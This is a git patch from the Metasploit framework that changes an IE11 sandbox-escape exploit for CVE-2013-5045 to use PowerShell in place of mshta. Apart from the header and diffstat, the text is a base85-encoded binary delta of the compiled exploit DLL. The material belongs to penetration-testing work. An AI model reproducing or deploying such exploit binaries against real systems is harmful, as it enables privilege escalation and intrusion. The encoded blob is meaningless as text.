<juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:01:56 -0500 Subject: [PATCH 463/853] Use powershell instead of mshta --- data/exploits/CVE-2013-5045/CVE-2013-5045.dll | Bin 166400 -> 166912 bytes .../CVE-2013-5045/CVE-2013-5045.cpp | 6 +++--- .../exploits/IE11SandboxEscapes/make.msbuild | 18 ------------------ .../local/ms13_097_ie_registry_symlink.rb | 18 ++++-------------- 4 files changed, 7 insertions(+), 35 deletions(-) delete mode 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/data/exploits/CVE-2013-5045/CVE-2013-5045.dll b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll index 3f912623885f6490ea79e3470401177a66f4418e..fd0b378216db3a34123c91d3eaf59bded77cfdeb 100755 GIT binary patch delta 21074 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 